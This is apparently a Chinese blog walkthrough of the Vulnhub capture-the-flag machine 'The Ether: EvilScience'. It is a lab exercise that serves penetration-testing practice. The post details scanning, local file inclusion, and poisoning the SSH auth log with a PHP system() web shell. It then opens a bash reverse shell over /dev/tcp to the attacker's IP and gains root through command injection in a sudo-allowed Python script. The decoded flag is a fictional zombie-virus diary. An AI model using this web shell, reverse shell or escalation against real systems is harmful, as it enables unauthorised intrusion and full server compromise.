首页 > 其他分享 >Vulnhub靶机:The Ether: EvilScience

Vulnhub靶机:The Ether: EvilScience

时间:2024-09-25 20:49:05浏览次数:9  
标签:October log 6.166 192.168 flag Vulnhub EvilScience 2017 Ether

0x01 项目地址

The Ether: EvilScience (v1.0.1)

0x02 靶机描述

The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag.

目标是找出 The Ether 的意图。你需要侵入他们的服务器,获取root权限,然后取回flag。

0x03 环境搭建

靶机

The Ether: EvilScience

NAT模式 192.168.6.166

攻击机

kali

NAT模式 192.168.6.128

0x04 详细步骤

1.主机发现

nmap -sP 192.168.6.0/24

2.端口扫描

nmap -p- -A -sV -Pn 192.168.6.166

开放了2280端口

3.目录扫描

dirsearch -u 192.168.6.166

扫到两个目录,之后可以拼接访问

4.Web访问

浏览器访问192.168.6.166,可以看到有三个页面,HOME/ABOUT US/RESEARCH

拼接访问/about.php,这个其实就是ABOUT US页面

http://192.168.6.166/about.php

拼接访问/images,发现是个空白页,什么也没有

5.漏洞挖掘

我们再分别看看ABOUT US页面和RESEARCH页面,尝试找找可利用的点,访问后在url中发现使用了file协议,可能存在文件包含

ABOUT US页面

RESEARCH页面

通过浏览器插件Wappalyzer可以看到中间件是Apache

那我们可以尝试日志文件包含来getshell,先尝试查看错误日志文件的默认目录,发现访问时直接重定向到了首页

http://192.168.6.166/?file=/var/log/auth.log

我们用Burp抓包再试一下

可以看到确实存在文件包含

端口扫描时还扫到了22端口开放了ssh服务,想利用ssh登录,尝试将我们想要写入的代码注入进错误访问日志中

ssh "<?php phpinfo();?>"@192.168.6.166

这里用kali进行ssh连接,一直提示远程用户名包含无效字符

然后换到本机开个cmd窗口连接没有这个提示

接着在Burp中再次查看错误日志,发现我们想要写入的代码成功写入,接下来就可以尝试写入一句话木马来getshell

6.漏洞利用

先写入可执行系统命令的一句话木马

ssh "<?php system($_GET[cmd]);?>"@192.168.6.166

然后尝试执行命令,这里尝试执行一下ls

&cmd=ls

发现命令执行成功,接下来可以尝试一下反弹shell

kali开启监听

nc -lvvp 9999

这里要执行的命令需要进行url编码,否则会报错

# 反弹shell命令
echo "bash -i >& /dev/tcp/192.168.6.128/9999 0>&1"|bash
# url编码后
echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.6.128%2F9999%200%3E%261%22%7Cbash

kali成功收到反弹shell

升级shell

python -c 'import pty;pty.spawn("/bin/bash");'

7.权限提升

使用sudo -l查看一下权限,发现py文件可以以root权限免密执行

sudo -l

使用这个python脚本后发现,在这个python脚本中,当我们运行/var/log/auth.log | 命令的时候,我们会以root身份来执行该命令

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

其实也就相当于拿到了root权限,那么我们可以尝试用此脚本来寻找flag文件

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | ls /root

然后把找到的flag.png文件拷贝到网站根目录下

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png

接着下载到本地

wget http://192.168.6.166/?file=flag.png

查看图片,发现不是flag

cat命令查看一下图片,发现一堆乱码

cat 'index.html?file=flag.png'

继续往下翻发现flag字样,紧跟着是一段经过base64编码的内容,这个内容解码后应该就是我们要找的flag

flag: b2N0b2JlciAxLCAyMDE3LgpXZSBoYXZlIG9yIGZpcnN0IGJhdGNoIG9mIHZvbHVudGVlcnMgZm9yIHRoZSBnZW5vbWUgcHJvamVjdC4gVGhlIGdyb3VwIGxvb2tzIHByb21pc2luZywgd2UgaGF2ZSBoaWdoIGhvcGVzIGZvciB0aGlzIQoKT2N0b2JlciAzLCAyMDE3LgpUaGUgZmlyc3QgaHVtYW4gdGVzdCB3YXMgY29uZHVjdGVkLiBPdXIgc3VyZ2VvbnMgaGF2ZSBpbmplY3RlZCBhIGZlbWFsZSBzdWJqZWN0IHdpdGggdGhlIGZpcnN0IHN0cmFpbiBvZiBhIGJlbmlnbiB2aXJ1cy4gTm8gcmVhY3Rpb25zIGF0IHRoaXMgdGltZSBmcm9tIHRoaXMgcGF0aWVudC4KCk9jdG9iZXIgMywgMjAxNy4KU29tZXRoaW5nIGhhcyBnb25lIHdyb25nLiBBZnRlciBhIGZldyBob3VycyBvZiBpbmplY3Rpb24sIHRoZSBodW1hbiBzcGVjaW1lbiBhcHBlYXJzIHN5bXB0b21hdGljLCBleGhpYml0aW5nIGRlbWVudGlhLCBoYWxsdWNpbmF0aW9ucywgc3dlYXRpbmcsIGZvYW1pbmcgb2YgdGhlIG1vdXRoLCBhbmQgcmFwaWQgZ3Jvd3RoIG9mIGNhbmluZSB0ZWV0aCBhbmQgbmFpbHMuCgpPY3RvYmVyIDQsIDIwMTcuCk9ic2VydmluZyBvdGhlciBjYW5kaWRhdGVzIHJlYWN0IHRvIHRoZSBpbmplY3Rpb25zLiBUaGUgZXRoZXIgc2VlbXMgdG8gd29yayBmb3Igc29tZSBidXQgbm90IGZvciBvdGhlcnMuIEtlZXBpbmcgY2xvc2Ugb2JzZXJ2YXRpb24gb24gZmVtYWxlIHNwZWNpbWVuIG9uIE9jdG9iZXIgM3JkLgoKT2N0b2JlciA3LCAyMDE3LgpUaGUgZmlyc3QgZmxhdGxpbmUgb2YgdGhlIHNlcmllcyBvY2N1cnJlZC4gVGhlIGZlbWFsZSBzdWJqZWN0IHBhc3NlZC4gQWZ0ZXIgZGVjcmVhc2luZywgbXVzY2xlIGNvbnRyYWN0aW9ucyBhbmQgbGlmZS1saWtlIGJlaGF2aW9ycyBhcmUgc3RpbGwgdmlzaWJsZS4gVGhpcyBpcyBpbXBvc3NpYmxlISBTcGVjaW1lbiBoYXMgYmVlbiBtb3ZlZCB0byBhIGNvbnRhaW5tZW50IHF1YXJhbnRpbmUgZm9yIGZ1cnRoZXIgZXZhbHVhdGlvbi4KCk9jdG9iZXIgOCwgMjAxNy4KT3RoZXIgY2FuZGlkYXRlcyBhcmUgYmVnaW5uaW5nIHRvIGV4aGliaXQgc2ltaWxhciBzeW1wdG9tcyBhbmQgcGF0dGVybnMgYXMgZmVtYWxlIHNwZWNpbWVuLiBQbGFubmluZyB0byBtb3ZlIHRoZW0gdG8gcXVhcmFudGluZSBhcyB3ZWxsLgoKT2N0b2JlciAxMCwgMjAxNy4KSXNvbGF0ZWQgYW5kIGV4cG9zZWQgc3ViamVjdCBhcmUgZGVhZCwgY29sZCwgbW92aW5nLCBnbmFybGluZywgYW5kIGF0dHJhY3RlZCB0byBmbGVzaCBhbmQvb3IgYmxvb2QuIENhbm5pYmFsaXN0aWMtbGlrZSBiZWhhdmlvdXIgZGV0ZWN0ZWQuIEFuIGFudGlkb3RlL3ZhY2NpbmUgaGFzIGJlZW4gcHJvcG9zZWQuCgpPY3RvYmVyIDExLCAyMDE3LgpIdW5kcmVkcyBvZiBwZW9wbGUgaGF2ZSBiZWVuIGJ1cm5lZCBhbmQgYnVyaWVkIGR1ZSB0byB0aGUgc2lkZSBlZmZlY3RzIG9mIHRoZSBldGhlci4gVGhlIGJ1aWxkaW5nIHdpbGwgYmUgYnVybmVkIGFsb25nIHdpdGggdGhlIGV4cGVyaW1lbnRzIGNvbmR1Y3RlZCB0byBjb3ZlciB1cCB0aGUgc3RvcnkuCgpPY3RvYmVyIDEzLCAyMDE3LgpXZSBoYXZlIGRlY2lkZWQgdG8gc3RvcCBjb25kdWN0aW5nIHRoZXNlIGV4cGVyaW1lbnRzIGR1ZSB0byB0aGUgbGFjayBvZiBhbnRpZG90ZSBvciBldGhlci4gVGhlIG1haW4gcmVhc29uIGJlaW5nIHRoZSBudW1lcm91cyBkZWF0aCBkdWUgdG8gdGhlIHN1YmplY3RzIGRpc3BsYXlpbmcgZXh0cmVtZSByZWFjdGlvbnMgdGhlIHRoZSBlbmdpbmVlcmVkIHZpcnVzLiBObyBwdWJsaWMgYW5ub3VuY2VtZW50IGhhcyBiZWVuIGRlY2xhcmVkLiBUaGUgQ0RDIGhhcyBiZWVuIHN1c3BpY2lvdXMgb2Ygb3VyIHRlc3RpbmdzIGFuZCBhcmUgY29uc2lkZXJpbmcgbWFydGlhbCBsYXdzIGluIHRoZSBldmVudCBvZiBhbiBvdXRicmVhayB0byB0aGUgZ2VuZXJhbCBwb3B1bGF0aW9uLgoKLS1Eb2N1bWVudCBzY2hlZHVsZWQgdG8gYmUgc2hyZWRkZWQgb24gT2N0b2JlciAxNXRoIGFmdGVyIFBTQS4K

flag的内容进行base64解码

echo "b2N0b2JlciAxLCAyMDE3LgpXZSBoYXZlIG9yIGZpcnN0IGJhdGNoIG9mIHZvbHVudGVlcnMgZm9yIHRoZSBnZW5vbWUgcHJvamVjdC4gVGhlIGdyb3VwIGxvb2tzIHByb21pc2luZywgd2UgaGF2ZSBoaWdoIGhvcGVzIGZvciB0aGlzIQoKT2N0b2JlciAzLCAyMDE3LgpUaGUgZmlyc3QgaHVtYW4gdGVzdCB3YXMgY29uZHVjdGVkLiBPdXIgc3VyZ2VvbnMgaGF2ZSBpbmplY3RlZCBhIGZlbWFsZSBzdWJqZWN0IHdpdGggdGhlIGZpcnN0IHN0cmFpbiBvZiBhIGJlbmlnbiB2aXJ1cy4gTm8gcmVhY3Rpb25zIGF0IHRoaXMgdGltZSBmcm9tIHRoaXMgcGF0aWVudC4KCk9jdG9iZXIgMywgMjAxNy4KU29tZXRoaW5nIGhhcyBnb25lIHdyb25nLiBBZnRlciBhIGZldyBob3VycyBvZiBpbmplY3Rpb24sIHRoZSBodW1hbiBzcGVjaW1lbiBhcHBlYXJzIHN5bXB0b21hdGljLCBleGhpYml0aW5nIGRlbWVudGlhLCBoYWxsdWNpbmF0aW9ucywgc3dlYXRpbmcsIGZvYW1pbmcgb2YgdGhlIG1vdXRoLCBhbmQgcmFwaWQgZ3Jvd3RoIG9mIGNhbmluZSB0ZWV0aCBhbmQgbmFpbHMuCgpPY3RvYmVyIDQsIDIwMTcuCk9ic2VydmluZyBvdGhlciBjYW5kaWRhdGVzIHJlYWN0IHRvIHRoZSBpbmplY3Rpb25zLiBUaGUgZXRoZXIgc2VlbXMgdG8gd29yayBmb3Igc29tZSBidXQgbm90IGZvciBvdGhlcnMuIEtlZXBpbmcgY2xvc2Ugb2JzZXJ2YXRpb24gb24gZmVtYWxlIHNwZWNpbWVuIG9uIE9jdG9iZXIgM3JkLgoKT2N0b2JlciA3LCAyMDE3LgpUaGUgZmlyc3QgZmxhdGxpbmUgb2YgdGhlIHNlcmllcyBvY2N1cnJlZC4gVGhlIGZlbWFsZSBzdWJqZWN0IHBhc3NlZC4gQWZ0ZXIgZGVjcmVhc2luZywgbXVzY2xlIGNvbnRyYWN0aW9ucyBhbmQgbGlmZS1saWtlIGJlaGF2aW9ycyBhcmUgc3RpbGwgdmlzaWJsZS4gVGhpcyBpcyBpbXBvc3NpYmxlISBTcGVjaW1lbiBoYXMgYmVlbiBtb3ZlZCB0byBhIGNvbnRhaW5tZW50IHF1YXJhbnRpbmUgZm9yIGZ1cnRoZXIgZXZhbHVhdGlvbi4KCk9jdG9iZXIgOCwgMjAxNy4KT3RoZXIgY2FuZGlkYXRlcyBhcmUgYmVnaW5uaW5nIHRvIGV4aGliaXQgc2ltaWxhciBzeW1wdG9tcyBhbmQgcGF0dGVybnMgYXMgZmVtYWxlIHNwZWNpbWVuLiBQbGFubmluZyB0byBtb3ZlIHRoZW0gdG8gcXVhcmFudGluZSBhcyB3ZWxsLgoKT2N0b2JlciAxMCwgMjAxNy4KSXNvbGF0ZWQgYW5kIGV4cG9zZWQgc3ViamVjdCBhcmUgZGVhZCwgY29sZCwgbW92aW5nLCBnbmFybGluZywgYW5kIGF0dHJhY3RlZCB0byBmbGVzaCBhbmQvb3IgYmxvb2QuIENhbm5pYmFsaXN0aWMtbGlrZSBiZWhhdmlvdXIgZGV0ZWN0ZWQuIEFuIGFudGlkb3RlL3ZhY2NpbmUgaGFzIGJlZW4gcHJvcG9zZWQuCgpPY3RvYmVyIDExLCAyMDE3LgpIdW5kcmVkcyBvZiBwZW9wbGUgaGF2ZSBiZWVuIGJ1cm5lZCBhbmQgYnVyaWVkIGR1ZSB0byB0aGUgc2lkZSBlZmZlY3RzIG9mIHRoZSBldGhlci4gVGhlIGJ1aWxkaW5nIHdpbGwgYmUgYnVybmVkIGFsb25nIHdpdGggdGhlIGV4cGVyaW1lbnRzIGNvbmR1Y3RlZCB0byBjb3ZlciB1cCB0aGUgc3RvcnkuCgpPY3RvYmVyIDEzLCAyMDE3LgpXZSBoYXZlIGRlY2lkZWQgdG8gc3RvcCBjb25kdWN0aW5nIHRoZXNlIGV4cGVyaW1lbnRzIGR1ZSB0byB0aGUgbGFjayBvZiBhbnRpZG90ZSBvciBldGhlci4gVGhlIG1haW4gcmVhc29uIGJlaW5nIHRoZSBudW1lcm91cyBkZWF0aCBkdWUgdG8gdGhlIHN1YmplY3RzIGRpc3BsYXlpbmcgZXh0cmVtZSByZWFjdGlvbnMgdGhlIHRoZSBlbmdpbmVlcmVkIHZpcnVzLiBObyBwdWJsaWMgYW5ub3VuY2VtZW50IGhhcyBiZWVuIGRlY2xhcmVkLiBUaGUgQ0RDIGhhcyBiZWVuIHN1c3BpY2lvdXMgb2Ygb3VyIHRlc3RpbmdzIGFuZCBhcmUgY29uc2lkZXJpbmcgbWFydGlhbCBsYXdzIGluIHRoZSBldmVudCBvZiBhbiBvdXRicmVhayB0byB0aGUgZ2VuZXJhbCBwb3B1bGF0aW9uLgoKLS1Eb2N1bWVudCBzY2hlZHVsZWQgdG8gYmUgc2hyZWRkZWQgb24gT2N0b2JlciAxNXRoIGFmdGVyIFBTQS4K" | base64 -d

最终的flag

october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!

October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.

October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.

October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.

October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.

October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.

October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.

October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.

October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.

--Document scheduled to be shredded on October 15th after PSA.

标签:October,log,6.166,192.168,flag,Vulnhub,EvilScience,2017,Ether
From: https://blog.csdn.net/weixin_57289348/article/details/142532947

相关文章

  • EtherCAT(以太网控制自动化技术)协议以其高带宽、低延迟特性,在工业自动化领域占据重要地
    一、MR30分布式IO模块概述EtherCAT(以太网控制自动化技术)协议以其高带宽、低延迟特性,在工业自动化领域占据重要地位。明达技术自主研发的MR30分布式IO模块作为EtherCAT协议的杰出应用,集成了多种输入输出功能,通过EtherCAT总线实现与主站的高效通信与控制,为纸巾包装行业带来革新。二、......
  • [vulnhub] LAMPSecurity: CTF4
    https://www.vulnhub.com/entry/lampsecurity-ctf4,83/端口扫描主机发现探测存活主机,138是靶机nmap-sP192.168.75.0/24//StartingNmap7.93(https://nmap.org)at2024-09-2314:13CSTNmapscanreportfor192.168.75.1H......
  • [vulnhub]LAMPSecurity: CTF5
    https://www.vulnhub.com/entry/lampsecurity-ctf5,84/主机发现端口扫描探测存活主机,139为靶机nmap-sP192.168.75.0/24StartingNmap7.93(https://nmap.org)at2024-09-2317:27CSTNmapscanreportfor192.168.75.1Hostisup(0.00049slatency).MACAddres......
  • Tether USDT市值突破1200亿美元大关,创历史新高!
    原文来源:币热网-区块链数字货币新闻消息资讯 币热网消息: Tether旗下的旗舰稳定币USDT正经历着前所未有的增长浪潮,进一步巩固了其在加密货币市场中的主导地位。据BeinCrypto的最新数据揭示,USDT的市值已逼近1200亿美元的里程碑,这一成就不仅彰显了其强大的市场影响力,也预......
  • vulnhub KioptrixVM3 靶场练习
    靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar一.安装下载完虚拟机直接打开这个文件就可以靶机的网络设为nat确保和kali一个网段正常启动是这样二.信息收集kali的ip为:192.168.231.133kali扫描iparp-scan-l确定目标主机ip为192.168.231.183......
  • VulnHub靶场笔记 - Breach: 2.1
    靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip一.安装下载后为压缩包文件解压后双击打开.ova文件根据压缩包里附带的说明我们需要将靶机的ip配为静态IP:192.168.110.151选择虚拟网络编辑器选择仅主机的网卡并将子网ip改为110网段点......
  • VulnHub-Narak靶机笔记
    Narak靶机笔记概述Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识靶机地址:https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwd=a7kv提取码:a7kv当然你也可以去Vulnhub官网下载一、nmap扫描1)主机发现sudonmap-sn192.168.84.0/24......
  • vulnhub - medium_socnet
    medium_socnet基本信息kaliip:192.168.157.161靶机ip:192.168.157.179主机发现与端口扫描nmap-sT--min-rate10000-p-192.168.157.179nmap-sT-sV-sC-O-p22,5000192.168.157.179没什么可利用信息,web页面的输入框不会执行命令目录扫描gobusterdir-uhttp://1......
  • vulnhub - Hackademic.RTB1
    vulnhub-Hackademic.RTB1基本信息收集nmap192.168.157.0/24nmap-sT--min-rate10000-p-192.168.157.178识别到是WordPress,直接上wpscanwpscan--urlhttp://192.168.157.178/-eat-eap-eu得到用户:NickJamesSQL注入有超链接的地方点点发现参数如下http://1......
  • VulnHub-Bilu_b0x靶机笔记
    Bilu_b0x靶机概述Vulnhub的一个靶机,包含了sql注入,文件包含,代码审计,内核提权。整体也是比较简单的内容,和大家一起学习Billu_b0x.zip靶机地址:https://pan.baidu.com/s/1VWazR7tpm2xJZIGUSzFvDw?pwd=u785提取码:u785一、nmap扫描1)主机发现sudonmap-sn192.168.84.......